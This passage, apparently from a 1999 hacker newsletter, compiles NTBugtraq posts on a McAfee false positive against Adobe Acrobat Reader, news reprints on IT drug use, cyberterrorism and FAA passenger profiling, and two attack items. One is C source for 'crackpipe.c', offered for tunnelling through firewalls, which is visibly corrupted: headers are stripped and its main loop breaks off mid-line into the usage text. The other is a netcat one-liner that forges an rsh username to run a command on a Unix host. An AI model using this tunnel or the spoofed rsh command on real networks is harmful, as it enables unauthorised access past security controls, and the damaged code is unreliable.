       Note, this means not in pre-release, not in released, not in any Adobe software (that goes for Pagemill too!).
       
       This means, to me, this has truly been a mis-detection by NAI and Adobe should be believed and trusted on this point.
       
       Now before I get a flood of messages from you X-Files fans out there, listen up.
       
       1.Adobe has never threatened me. Their PR schpiel could use some work, and they should learn better how to deal with privacy issues and technical
       consumers, but I don't, and haven't, felt compelled to say or do anything.
       
       2.I have believed, all along, that this was a mis-detection. When Jim sent me the email from service@adobe.com, I was very suspicious. When I downloaded a
       then current version of the pre-release and couldn't find a file called NETBUSPRO.DR in there anywhere, I scratched my head and wrote some things. All
       along, however, I believed it would be borne out to be a mis-detection.
       
       3.You guys, or those that responded to me directly (hundreds of you, thanks!), weren't so convinced. So my Adobe editorial reflected that skeptism and
       doubt, mixed with the facts I had at hand.
       
       4.For the die-hard conspiracy theorist amongst you, I have a copy of Jim's user's original download of the pre-release. Its 4.6MB zipped, and I won't send it
       more than a couple of times, but if you can convince me its going to prove something for you to look at it, I'll pass it along. 
       
       There's a few lessons to be learnt here;
       
       I.Anti-virus software will always mis-detect when they are based on signature "profiling".
       
       II.AV Vendors should all have publicly accessible pages stating any and all mis-detections and should be updated immediately once a mis-detection is
       confirmed. I don't think it matters what liability issues might be obstacles to such a page, the damage mis-detections can cause to individuals, corporations,
       software distribution venues, as well as publishers, should be allayed by the AV Vendor who mis-detects.
       
       I have had numerous reports from a variety of sources about the horror stories mis-detection has caused (and is still causing).
       
       I don't think we need view mis-detections as a flaw in the AV software, since they're a fact of the way AV software works. Like Email hoaxes, such
       spurrious incidents occur, and re-occur, and so should be stated somewhere for all to see.
       
       One individual told me of how a mis-detection of a macro virus in a Word document led two partner companies to nearly dissolve their relationship because
       of the insistance of both sides that they had the facts of the matter (virus or not virus).
       
        III.If PR people are going to handle "rumors" such as this one with Adobe, they better know what they're talking about and whom they're talking to. Sarah,
       from Adobe, meant to send a message to NTBugtraq but sent it to Bugtraq instead because "she got the names mixed up". Gee, I guess she hadn't read
       any of the thread then, had she (or anyone in the PR side of Adobe). Next she send me a private unequivacol response to my explicit request for a
       message to NTBugtraq...duh...
       
        IV.It should be the responsibility of the AV Vendor to make all public statements about mis-detections, including coordinating with the "harmed" vendor and
       making statements on their behalf. Where's NAI's public statement after all this time??? They must believe announcing they mis-detected something will
       harm their share value...meanwhile Adobe is left hanging in the wind having to tell the world what NAI has said...without any public confirmation from NAI
       themselves!!
       
       Now Tim told me that our friend Vinnie, Vincent Gullotto, Manager of AV Researchers at AVERT, was "going to have a page put up soon". Well Tim, he told
       me that too, last week...and we're still waiting. 
       
       Finally, many of you are probably wondering why I've spent any time on this, or what it has to do with NT Security in the first place...good question...;-]
       
       Fact is, the original issue occured with 2 pieces of NT software, so its somewhat related to NT. More importantly, it was a test of the response mechanisms for the
       companies involved. Think of it like those tests of the Early Warning System we used to get on TV.
       
       As I told Tim;
       
       a.Had the Adobe service rep., the one who responded to Jim's user's question about the detection, not said that a file called NETBUSPRO.DR was in the
       Acrobat Reader package, none of this would ever have seen the light of day.
       
       b.Had Adobe put up a publicly accessible page on 3/19, when they first knew, and had had confirmed by NAI, that McAfee VirusScan was mis-detecting,
       none of this would ever have seen the light of day.
       
       c.Had NAI responded to NTBugtraq when I asked them to, and they said they would, the issue would have been dead at that time.
       
       d.Had Adobe's PR not put out the message they did, wherein they couldn't distinguish between a virus and a trojan, or between a malicious piece of code and
       a commercial software package, and instead had said what they said later, the issue would have been dead. 
       
       They didn't, so the issue wouldn't die amongst you, and I kept getting messages making me say more and dig more.
       
       All in all, Adobe's none too happy with my speculation and fact mix, NAI's probably not going to talk to me in the future (or for a while anyway), and I've annoyed
       more than one of you with too many messages about this issue.
       
       ...sigh...the life of a moderator...;-]
       
       Cheers,
       Russ - NTBugtraq moderator 
       
       -------------------------------------------------------------------------------
       
       http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm
       
       McAfee VirusScan 4.x Incorrectly Reports Virus in Ar40.exe or Ar40eng.exe
       
       Document number 323180
       
       
       Issue
       McAfee VirusScan 4.x for Windows reports one or more of the following errors: 
       - "McAfee VShield: Virus found in download file!" 
       - "Downloaded File: AR40.ZIP -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download or
       transmit an infected file. Please delete this file and alert the Webmaster of the virus." 
       - "Infected File: AR40.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned. Please
       delete the file and restore it from your backup diskettes." 
       - "AR40.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected" 
       - "Downloaded File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download
       or transmit an infected file. Please delete this file and alert the Webmaster of the virus." 
       - "Infected File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned.
       Please delete the file and restore it from your backup diskettes." 
       - "AR40ENG.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected" 
       
       Details 
       - You are downloading or have downloaded Adobe Acrobat Reader 4.0 Pre-Release for Windows (Ar40.exe) or Adobe
       Acrobat Reader 4.0 for Windows (Ar40eng.exe). 
       - You're using McAfee virus definitions 4.0.4017 dated March 15, 1999. 
       
       Solution
       Download and install virus definitions 4.0.4019 or later from the McAfee Web site at http://www.mcafee.com/. The virus
       definitions 4.0.4019 are dated March 29, 1999. 
       
       Additional Information
       Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro
       software. 
       
       McAfee VirusScan 4.x falsely reports the NetBusPro.dr virus when scanning Ar40.exe and Ar40eng.exe when using
       virus definitions 4.0.4017. The virus alert is caused by an error in version 4.0.4017 of the virus definitions file distributed
       by Network Associates -- it is not caused by a virus. This has been confirmed by Adobe Systems, Inc. as well as by
       the virus lab at Network Associates. When you install virus definitions 4.0.4019, VirusScan 4.x does not report an error
       with Ar40.exe or Ar40eng.exe. 
       
       All pre-release and release versions of Acrobat 4.0 Reader are free of known viruses. Adobe uses a variety of
       anti-virus software in addition to McAfee VirusScan to thoroughly screen all software before it is publicly released.
       Ar40.exe was released in February 1999. Before uploading it, Adobe used VirusScan 4.x with virus definitions 4.0.4014
       dated February 18, 1999 to verify Ar40.exe was clear of viruses. Before uploading Ar40eng.exe, released in April 1999,
       Adobe used VirusScan 4.x with virus definitions 4.0.4019 to verify Ar40eng.exe was clear of viruses. 
       
       For further inquiries regarding this issue, please contact Sarah Rosenbaum, Group Product Manager for Adobe Acrobat,
       at srosenba@adobe.com. 
       
       Related Records:
        Product:
                         Acrobat Reader
        Platform:
                         Windows
        Last Updated:
                         04/08/99
        Filename:
                         19bc6.htm
                         MacAfee
       
       
       Legal Notice for information contained in the Technical Solutions Database
       
       THIS DATABASE AND THE DOCUMENTS INCLUDED THEREIN (COLLECTIVELY, THE "DATABASE") ARE PROVIDED FOR THE
       CONVENIENCE AND PRIVATE, INTERNAL USE OF ADOBE'S CUSTOMERS ONLY. YOU MAY NOT COPY OR DISTRIBUTE ANY PORTION
       OF THIS DATABASE FOR ANY PURPOSE, EXCEPT THAT YOU MAY MAKE ONE PRINTED COPY OF PORTIONS OF THIS DATABASE FOR
       YOUR OWN PERSONAL, INTERNAL USE ONLY, PROVIDED THIS ENTIRE DISCLAIMER AND COPYRIGHT NOTICE IS INCLUDED ON
       SUCH COPY.
       
       THE USER OF THE INFORMATION PROVIDED IN THIS DATABASE ASSUMES ALL RISK OF ITS ACCURACY AND FOR ITS USE. THIS
       DATABASE IS BEING PROVIDED "AS-IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, BUT NOT
       LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
       NON-INFRINGEMENT. ALL OTHER LIMITATIONS ON LIABILITY CONTAINED IN THE APPLICABLE SOFTWARE PRODUCT END USER
       LICENSE AGREEMENT SHALL APPLY. ADOBE SYSTEMS INCORPORATED ASSUMES NO RESPONSIBILITY FOR ERRORS OR OMISSIONS
       IN THE DATABASE. THIS DATABASE MAY INCLUDE TECHNICAL OR OTHER INACCURACIES OR TYPOGRAPHICAL ERRORS, AND
       CHANGES MAY BE PERIODICALLY ADDED TO THE INFORMATION HEREIN.
       
       ADOBE SYSTEMS INCORPORATED DOES NOT GUARANTEE THAT SOLUTIONS SUGGESTED IN THIS DATABASE WILL BE EFFECTIVE
       IN THE USER'S PARTICULAR SITUATION. IF THE USER IS NOT FAMILIAR WITH ANY OF THE STEPS LISTED IN THE SOLUTION, ADOBE
       ADVISES THAT THE USER DOES NOT PROCEED WITHOUT FIRST CONSULTING ADDITIONAL RESOURCES.
       
       -------------------------------------------------------------------------------
       
       Date: Wed, 14 Apr 1999 14:33:59 -0400
       From: Russ 
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Adobe: Conclusion Part 2 - final
       
       FYI: NAI now has a public web statement posted at:
       http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp
       
       This closes the issue.
       
       Cheers,
       Russ - NTBugtraq moderator
       
       
       [http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp]
       
       Network Associates certifies that Adobe software, such as Acrobat 
       Reader, does not contain, and never did contain, the NetBusPro Trojan. 
       
       Posted April 13, 1999
       
       McAfee VirusScan 4.x falsely reported the NetBusPro.dr
       trojan when scanning Ar40.exe and Ar40eng.exe pre-release
       software when using virus definitions 4.0.4017. The virus alert
       was caused because there was identifying code within Adobe’s
       product that had a similar pattern as trojan known as NetBusPro.dr.
       This has been confirmed by the virus lab at Network Associates,
       Inc. and by Adobe Systems Incorporated. If you are experiencing
       this problem 
       please upgrade your DAT to virus definitions to at least v4.0.4019, 
       and all issues will be rectified. 
       Sincerely, 
       
       AVERT, A Division Of NAI Labs
       
       
       @HWA      
       
 10.0  Crackpipe.c bypasses any firewalls via tunneling (linux)    
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
       /* crackpipe.c -- uses the ethertap stuff to try to tunnel an IP,
          without using ipip, to break through firewalls.  May the world's
          fascist admins rot in hell for their port-blocking policies. */
       
       /* usage information is in comments at the very end of this file */
       
       #include 
       #include 
       #include 
       #include 
       #include 
       #include 
       #include 
       #include 
       
       
       /* define TCP or UDP here so we can decide how we'd like to
          connect. */
       #define UDP
       #undef TCP
       
       /* maximum size to use for the copy buffer */
       /* setting the MTU of the tap device to something bigger than this
          would probably be a bad idea, methinks */
       
       #define BUFSIZE 4096
       
       /* also, the mtu for the tap device must be smaller than the
          mtu of your connection to the net...  if it's not, packets will be
          chopped up in transit..  looking at this, I'd say you've gotta have
          16 bytes difference, at least, but what's the point in pushing your
          luck.  go for a couple hundered or so, so if your ethernet uses an
          MTU of 1500, do something like 1200 for safety when you ifconfig
          tap0 */
       
       void selectloop(int netfd, int tapfd);
       void usage(void);
       
       char buffer[BUFSIZE];
       
       
       main(int ac, char *av[]) {
       
            int destport;
            struct sockaddr_in destaddr;
            struct hostent *ht;
            int sock;
            int daemon;
            int netfd;
            int tapfd;
       
            /* check for a sane number of parameters */
            if(ac != 3) 
                 usage();
            
            /* get port number, bail if atoi gives us 0 */
            if((destport = atoi(av[2])) == 0) 
                 usage();
       
            /* check if we're a daemon or if we will connect. */
            if(av[1][0] == '-') 
                 daemon = 1;
            else
                 daemon = 0;
       
            if(!daemon) {
                 /* resolve DNS */
                 if((ht = gethostbyname(av[1])) == NULL) {
                      switch(h_errno) {
                      case HOST_NOT_FOUND:
                           printf("%s: Unknown host\n", av[2]);
                           break;
                      case NO_ADDRESS:
                           printf("%s: No IP address for hostname\n", av[2]);
                           break;
                      case NO_RECOVERY:
                           printf("%s: DNS Error\n", av[2]);
                           break;
                      case TRY_AGAIN:
                           printf("%s: Try again (DNS Fuckup)\n", av[2]);
                           break;
                      default:
                           printf("%s: Unknown DNS error\n", av[2]);
                      }
                      exit(0);
                 }
                 
                 /* set up the destaddr struct */
                 
                 destaddr.sin_port = htons(destport);
                 destaddr.sin_family = AF_INET;
                 memcpy(&destaddr.sin_addr, ht->h_addr, ht->h_length);
       
            }
       
       #ifdef TCP
            sock = socket(AF_INET, SOCK_STREAM, 0);
       #endif
       
       #ifdef UDP
            sock = socket(AF_INET, SOCK_DGRAM, 0);
       #endif
       
            if(sock == -1) {
                 perror("socket");
                 exit(0);
            }
       
            printf("Opening network socket.\n");
            
            if(!daemon) {
                 if(connect(sock, &destaddr, sizeof(struct sockaddr_in)) ==
                    -1) {
                      perror("connect");
                      exit(0);
                 }
                 netfd = sock;
            } 
            else {
                 struct sockaddr_in listenaddr;
       #ifdef UDP
                 struct sockaddr_in remote;
       #endif
                 int socklen;
                 
                 listenaddr.sin_port = htons(destport);
                 listenaddr.sin_family = AF_INET;
                 listenaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
                 
                 if(bind(sock, &listenaddr, sizeof(struct sockaddr_in)) ==
                    -1) {
                      perror("bind");
                      exit(0);
                 }
       
                 socklen = sizeof(struct sockaddr_in);
       
       #ifdef TCP
         
                 if(listen(sock, 1) == -1) {
                      perror("listen");
                      exit(0);
                 }
       
                 printf("Waiting for TCP connection...\n");
       
       
                 if((netfd = accept(sock, &listenaddr, &socklen)) == -1) {
                      perror("accept");
                      exit(0);
                 }
       
                 
       
       #else /* TCP */
                 netfd = sock;
       
                 recvfrom(netfd, buffer, BUFSIZE, MSG_PEEK, &remote,
                          &socklen);
       
                 connect(netfd, &remote, socklen);
       
       #endif
            }     
            /* right.  now, we've got netfd set to something which we're
               going to be able to use to chat with the network. */
            
            printf("Opening /dev/tap0\n");
       
            tapfd = open("/dev/tap0", O_RDWR);
            if(tapfd == -1) {
                 perror("tapfd");
                 exit(0);
            }
       
            selectloop(netfd, tapfd);
            
            return 0;
       }
         
       void selectloop(int netfd, int tapfd) {
       
            fd_set rfds;
            int maxfd;
            int len;
       
            if(netfd > tapfd)
                 maxfd = netfd;
            else
                 maxfd = tapfd;
       
       
            while(1) {
       
                 FD_ZERO(&rfds);
                 FD_SET(netfd, &rfds);
                 FD_SET(tapfd, &rfds);
       
                 if(select(maxfd+1, &rfds, NULL, NULL, NULL) == -1) {
                      perror("select");
                      exit(0);
                 }
       
                 if(FD_ISSET(netfd, &rfds)) {
                      FD_CLR(netfd, &rfds);
                      
                      if((len = read(netfd, buffer, BUFSIZE))  
          
          the first argument is either the hostname to connect to, or, if
          you're the host which will be listening, a -.. obviously, the
          system inside the firewall gives the hostname, and the free system
          gives the -.  
       
          both sides must specify a port #...  this should, clearly, be the
          same for both ends...
       
          that should explain it..
       */
       
       /* oh, also, here's what you'll need to turn on in the linux kernel --
       
          first, you'll need a kernel in the later 2.1 range... I'd say from
          2.1.80 up should be cool, but I'm not positive about that..  if all
          of the config options I mention below aren't present, it's too old.
       
          in the "Networking Options" section, turn on:
          "Kernel/User netlink socket"
          and, just below,
          "Netlink device emulation"
       
          also, in the "Network device support" section, turn on:
          "Ethertap network tap"
       
          if those are compiled in, your kernel is set. */
       
       /* configuring the ethertap device --
       
          first, the necessary /dev files need to exist, so run:
          mknod /dev/tap0 c 36 16
       
          to get that to exist.
       
          next, you have to ifconfig the ethertap device, so pick a subnet
          you're going to use for that.  in this example, we're going to use
          the network 192.168.1.0, with one side as 192.168.1.1, and the
          other as 192.168.1.2...  so, you'll need to do:
       
          ifconfig tap0 192.168.1.1(or .2) mtu 1200
       
          (see the notes at the beginning for a good size for the mtu value.
          basically, it's got to be lower than the mtu value listed for eth0
          when you run ifconfig)
       
          2.1 kernels should create the needed route automatically, so that
          shouldn't be a problem.
       
       */
       
       /* hopefully, no matter how 14m3 you are, that will give you some idea
          of what you need to do, config-wise.  if not, well, then ask some
          '1337 linux-guru type d00d, and hopefully he can get the routing
          and shit right. */
       
 11.0  Unix rshd and rsh/rpc vulnerabilties in WindowsNT
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
       Date: Thu, 8 Apr 1999 19:11:54 -0700
       From: Eric Gisin 
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: rsh/rcp is not secure
       
       This is really a UNIX rshd bug, but it affects users of the NT clients.
       
       It's old news that the BSD rsh/rcp services are not secure, however rshd is
       still is enabled in many UNIX systems. There are rsh/rcp clients in Windows
       NT, and people are not aware of the ease of defeating security in this
       environment.
       
       The security of this service is based on privileged ports, which are not
       widely implemented. The NT versions of rcp/rsh have no special privileges
       like the UNIX versions. Anyone can modify the source or use netcat to fake
       the client username. For example,
           D:> nc -v unixhost 514 -p 666
           ^@newbie^@newbie^@chmod a= .^@
       This will execute the chmod command under newbie's account, if he permits
       access from that client machine in .rhosts.
       
       Basically the problem is since Windows NT includes rsh/rcp, people assume
       it's as secure as the UNIX counterpart, which is not the case.
       
       --------------------------------------------------------------------------
       
       Date: Fri, 9 Apr 1999 09:28:04 -0700
       From: David LeBlanc 
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Re: rsh/rcp is not secure
       
       At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:
       
       >Basically the problem is since Windows NT includes rsh/rcp, people assume
       >it's as secure as the UNIX counterpart, which is not the case.
       
       The UNIX counterpart isn't really all that secure in any case - it assumes
       that no one on the network can be root, and so come from a low port.
       
       Something else to think about is that running a rshd on NT isn't usually a
       good idea - several implementations run everything as LocalSystem, and the
       ones that don't store live user passwords.
       
       These utilities are full of other security holes - look at the checks in
       the various scanning products for some examples.  Safest thing is just not
       to run rsh, rlogin and rexec.
       
       
       David LeBlanc
       dleblanc@mindspring.com
      
       
       @HWA
       
       
 12.0  IT professionals are on Drugs?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From The Independent (UK)
       
       http://www.independent.co.uk/net/990419ne/story1.html
       
       
       The high techies 


       They are young, well-paid and, increasingly, turning to recreational
       drugs to cope with the pressures of their jobs as IT programmers,
       engineers and developers. By Samantha Downes 
      
       The violent death of Chris Dawes, multi-millionaire founder
       of software company Micromuse, grabbed the headlines
       last month. Dawes was killed when his £640,000 F1
       McLaren crashed in rural Essex. 
      
       At the time, he was facing charges for possession of and
       intent to supply crack cocaine. 
      
       While Dawes' death may be an extreme example of the
       perils of being a hi-tech high flyer, there is a proliferation of
       recreational drug use in the IT industry. 
      
       Young IT professionals have eschewed the 1980s black
       suit for combat fatigues and trainers. The dance and drugs
       culture has been enthusiastically embraced by these affluent
       twentysomethings who do not have time for long lunches or
       hanging out in wine bars. 
      
       The IT programmers and engineers The Independent met
       in London clubs saw their drug taking as an outlet which
       eases long hours and mops up some of their considerable
       salaries. Robert, a 23-year-old London-based web
       designer, believes he is a typical example of the
       recreational drug user. 
      
       He started taking speed while at university and has
       graduated to ecstasy and cocaine since starting his job two
       years ago. "That coke-snorting thing behind the wheel of a
       Ferrari is such a bloody cliché," he said. "It's not about
       being glamourous now, it's about relaxing and being
       sociable." 
      
       Jules, also 23, is a "boring nerd, but I do love my job". He
       works as a systems engineer at an investment bank and,
       like Robert, takes ecstasy, but only at weekends. "We all
       work incredibly hard. Most of the time there are not
       enough hours for an after-work beer," he said. 
      
       "And although the work can be monotonous it is very well
       paid. So getting blasted is simply a fast route to relaxation."
      
       Extra pressures such as the millennium bug have pushed IT
       professionals into fitting the archetypal recreational drug
       abuser profile, according to Dr David Best, research
       co-ordinator at the National Addiction Centre and an
       honourary lecturer at the Institute of Psychiatry. 
      
       Dr Best believes that recreational drug abusers are
       attracted by the image of drug taking as much as the effect
       of the drugs themselves. 
      
       "Stimulant drugs like cocaine are appealing to young
       wealthy executives because they are associated with
       gregarious, sociable behaviour," he said. "They are more
       likely to be used by young up and coming professionals
       recreationally. These people have a high disposable income
       and their jobs are pressurised and demanding." 
      
       The IT industry's relative youth and its location in cities or
       large towns also make it prey to opportunistic pushers.
       Most weekend users admit that they do not have to go out
       hunting for drugs. "My boss supplies me with the drugs,"
       one female programmer said. 
      
       There are geographical variations in drug availability. It is
       more likely in cities, but it will also depend on the network
       of the individuals involved and their external contacts, Dr
       Best said: "Those who sell drugs are opportunistic and if
       they see a market they will sell to it." 
      
       Dr Best said small firms in newer industries are less likely
       to have the screening processes in place to discourage drug
       taking. American financial firms in the City have for several
       years implemented strict and expensive screening, but there
       appear to be few measures to prevent or dissuade some
       young IT employees from taking drugs. 
      
       Louise, a 20-year-old software developer from
       Hertfordshire, travels down to London each weekend to
       join her young, heavily salaried bosses for a binge. "I work
       in a young industry where things are changing all the time. I
       am highly stressed a lot of the time. Most days I'm working
       12 to 14 hours. I can't afford to live in London because I
       work out in the sticks. But because of my hours during the
       week I can spend what I earn going out every weekend.
       It's easy to get drugs, whether E, speed or coke." 
      
       Personality-based theories of drug use might find
       sustenance in the stereotypical image of the nerdy
       computer boffin. 
      
       "We found that drug users tend to be those with low
       autonomic arousal, people who have low levels of system
       activity," Dr Best said. "They need external stimuli and are
       those most likely to pursue drugs." 
      
       "My job is not creative, but that doesn't mean that I'm not
       creative," explained Louise. "When I'm on E it feels like my
       mind has opened up - I don't care about anything." 
      
       According to the Standing Conference on Drug Abuse,
       there have been more than 70 notified deaths of ecstasy
       users in the UK since 1992, but most of the users we
       spoke to felt the risks were infinitesimal. Those who took
       cocaine or speed were even less concerned, because these
       drugs are seen as more established and their effects as
       better documented. 
      
       But employers who turn a blind eye should note the
       side-effects identified by Dr Valerie Curran, reader in
       psychopharmacology at University College London. Her
       research has shown that a significant number of users are
       liable to bouts of depression. This manifests itself in what
       the Institute for Drug Dependence calls "presenteeism" -
       where people were at work but unable to perform their job
       to the best of their ability. 
      
       "We found regular users who were clinically depressed at
       some stage during the week," Dr Curran said. "Ecstasy
       makes your brain spill out huge levels of serotonin, the
       feel-good hormone, and the brain has to work really hard
       to get it back." 
      
       Dr Curran found that the average use of ecstasy and
       cocaine was every other week. But regular users need
       more to keep them at the same level of high. 
      
       "If you give four doses of ecstasy to a monkey it still has
       brain damage two years later," she said. 
      
       But Anne Marshall, director of Adfam, believes that
       weekend drug users are well aware of the risks of their
       illicit habit. "When it comes to the health issues, people
       poo-poo all the information pushed at them. Those who
       use drugs at the weekend have the attitude: 'I work hard, I
       like to relax but don't have the time, so I need to take
       something to switch off immediately.' 
      
       "The problem might not be at a level that is important, but
       the effects can be long term: relationships with partners or
       friends may break down, which can be just as damaging." 
      
       But Marshall believes that in most cases users stop
       because they simply get too old. "As with alcohol, where
       the effects of a hangover get worse even as you enter your
       mid-20s, so too do the effects of drug abuse. That's when
       people start to re-think their habit. It gets harder to sustain
       and they have to look for something more rewarding." 
      
       Peter Skyte, national officer for the 12,000-strong IT
       Professionals Association, part of the Manufacturing
       Science and Finance Union, said employers had a duty to
       prevent drug abuse: bosses should look for "the problem
       not the symptom". 
      
       "Drug problems may be work related," Mr Sykes said.
       "Many employers may worsen problems by imposing
       certain conditions. They have an obligation to identify risks
       in the workplace, such as the stress which can be caused
       by long hours. 
      
       "We would urge all employers, no matter how small, to
       make a commitment at senior levels to provide counselling
       and support for all employees," he added. 
       
       @HWA       
       
 13.0  Rand corporation releases a paper on Cyber Terrorism
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From wired:http://www.wired.com/news/news/politics/story/19208.html
       
      How to Fight a Cyberwar
      Wired News Report 

      3:00 a.m.  20.Apr.99.PDT
      Future terrorists will take to the Internet to pursue campaigns of disruption instead
      of destruction, a new report predicts. 

      Terrorists are already tech-savvy, the Rand Corporation paper claims. Osama bin
      Laden's remote Afghan retreat is well wired: "The terrorist financier has
      computers, communications equipment, and a large number of disks for data
      storage." 

      Hamas has also taken to the Internet to exchange operational information. For
      example, operatives communicate via chat rooms and email. 

      The report distinguishes between "cyberwar" -- a military operation -- and
      "Netwar," which, the authors believe, will consist of nonmilitary attacks perpetrated
      by individuals rather than countries. "Whereas cyberwar usually pits formal
      military forces against each other, Netwar is more likely to involve nonstate,
      paramilitary, and irregular forces." 
      
      The report, prepared for the US Air Force, recommends that the Pentagon stop
      modernizing all computer systems and communications links. "Full
      interconnectivity may in fact allow  cyberterrorists to enter where they could
      not [before]," it says. 

      The report warns that terrorism "will focus on urban areas with strong political
      and operational constraints." Translation: It's difficult for the Air Force to bomb the
      bejesus out of a terrorist nest if it's in downtown New York. 

      Another recommendation is that the Air Force develop better spying technologies.
      Instead of trying to break encryption, the military should develop "capabilities for
      reading emanations" from computer monitors, perhaps through "very small,
      unmanned aerial vehicles." 

      Other studies have reached similar conclusions about online terrorists. 

      "The Internet -- and the window to it, the computer terminal -- have become
      two of the most important pieces of equipment in the extremists' arsenals, not
      only allowing them to build membership and improve organization, but to strike
      alliances with people and groups, even a decade ago, that they might never have
      known about or been able to easily communicate with," says a report
      prepared in April 1998 for the Chemical Manufacturers Association. The report's
      authors are former officials from the US Secret Service and the CIA's
      counterterrorism center. 
      
      @HWA
      
 14.0  FAA to implement CAPS
       ~~~~~~~~~~~~~~~~~~~~~
       Via HNN and Wired http://www.wired.com/news/news/politics/story/19218.html
         
       FAA to Implement CAPS 

       contributed by Space Rogue 
       A $2.8 Billion system is to be used by the FAA to monitor airline passengers. 
       Traveler information will be run through the FAAs secret algorithm and matched
       against a terrorist profile. If passengers fit the profile, or are chosen at
       random, increased security will be given to their luggage. While some airlines 
       (NorthWest) have already voluntarily implemented computer-assisted passenger 
       screening programs (CAPS), the FAA may make it mandatory for all airlines.
       (Hmmm, maybe I won't go to DefCon after all.)      
       
       
       You? A Terrorist? Yes!
       by Declan McCullagh 
       
       3:00 a.m.  20.Apr.99.PDT
       WASHINGTON -- A US$2.8-billion monitoring system championed by Vice President Gore 
       will use computer profiles to single out airline passengers for investigation and
       scrutiny. 
       
       Airlines will use a secret algorithm to compare travelers' personal data to profiles 
       of likely terrorists, according to a new proposed federal regulation.Other travelers 
       will be chosen at random. 
       
       Critics complain the plan shows that Gore doesn't really support privacy. Last May, 
       the vice president told an audience of graduating students at New York University that
       privacy "is a basic American value." 
       
       "He's been talking about privacy and the protection of personal information online, but
       those principles that he talks about don't parallel what he's done. He's tried to force
       intrusive measures into law," says Lisa Dean, vice president of the Free Congress 
       Foundation. "We'd have even more of this with a President Gore." 
       
       The vice president chaired a high-level White House commission that in 1997 released 
       recommendations that the Federal Aviation Administration compiled into a 40-page rule
       published Monday. 
       
       Unless FAA officials change their minds, all 32 US-based airlines will be required to 
       concoct computer-assisted passenger screening programs, called CAPS. Many of the larger
       airlines, including Northwest Airlines, have already complied. 
       
       "It's software that runs on the airline's reservation system. What it does is select
       passengers whose checked bags will require additional security and it also selects 
       passengers at random," says FAA spokesperson Rebecca Trexler. 
       
       According to the proposed rule, "Random selection helps to ensure passengers' civil 
       liberties by guaranteeing that no individual or group of individuals is excluded from
       the selection process." 
       
       Airlines will already know that you are flagged as a suspicious passenger when you 
       arrive at the ticket counter, according to Susan Rork, managing director of security at
       the Air Transport Association. 
       
       "The customer service agent would get a signal whether you would be selected for 
       additional security measures," said Rork, and your checked luggage would be put aside 
       to be examined for bombs. 
       
       Might you be interrogated by police as well? "We are not at this point taking this beyond
       the checked baggage," she said. Exactly how CAPS databases profile Americans and what 
       information is used remains secret. The FAA, the Department of Justice, and the airline
       industry -- which jointly developed terrorism profiles behind closed doors -- all claim
       that details must remain confidential for the system to work. The regulation says simply,
        "The automated system 'scores' passengers according to a set of weighted criteria to 
       determine which should be subjected to additional security measures." 
       
       But testimony at a June 1998 House Transportation subcommittee hearing suggested that 
       terrorist profiles are built using a passenger's last name, whether the ticket was 
       purchased with cash, how long before departure it was bought, the type of traveling 
       companions, whether a rental car is waiting, the destination of the flight and passenger,
       and whether the ticket is one-way or round-trip. 
       
       "Much of the information in that profile is proprietary. Essentially the profile is an
       automated system, not a manual system. It's created from the passenger reservation records
       and information that is gleaned in passenger reservation records," said ATA's Rork. 
       
       In an October 1997 report, the Department of Justice said that CAPS will analyze passenger
       information by assigning positive and negative values to personal information. "To determine 
       whether a passenger should be selected, the airline reservation computer identifies the 
       factors that the passenger has hit upon and totals the positive and negative scores; those 
       passengers who score below the FAA-prescribed cutoff are selectees," The Department of Justice
       said. 
       
       A letter from Attorney General Janet Reno accompanying the 12-page report said that CAPS "will
       not discriminate on the basis of race, color, national or ethnic origin, religion, or gender." 
       
       Civil libertarians aren't so easily reassured. "This is not rocket science. Everyone who 
       knows profiling knows that innocent characteristics can have a disparate impact based on race,"
       said ACLU legislative counsel Greg Nojeim. 
       
       "For example, a profile that uses past travel to a terrorist-list country to identify people who 
       will be selected for heightened scrutiny is guaranteed to discriminate against people who trace 
       their ancestry to those countries and visit their grandparents there." 
       
       The ACLU has collected a list of complaints about passenger profiling. 
       
       One respondent, who said he was a Northwest Airlines traveler, griped, "The representative 
       indicated that I was selected by the computer for special treatment. At that point, the security
       person donned surgical gloves and proceeded to go through each and every item in my briefcase in
       front of all people.... I was very displeased with the whole experience, and felt that it 
       constituted an unwarranted intrusion on my privacy." 
       
       Nojeim, a member of the Gore commission's civil liberties advisory panel, said that the commission
       rejected his group's concerns. Among the recommendations not followed by the FAA are an end date to
       the profiling system, an independent watchdog panel, and a commitment to not record names and 
       information about suspicious travelers. The FAA says that it currently plans to record that data
       for 72 hours, but is considering keeping them on file for 18 months. The proposed regulation also 
       allows the FAA or law enforcement unlimited access to the records "in the course of investigating 
       accidents or security incidents." 
       
       The regulations stem from increasing government nervousness about terrorism. Officials warn that a
       1995 conspiracy involved Ramzi Ahmed Yousef and other conspirators who planned to bomb 12 US airliners
       over the Pacific Ocean. The 1996 crash of TWA flight 800 -- which the FBI and National Transportation 
       Safety Board said was not a terrorist act -- caused Clinton to create the Gore commission. 
       
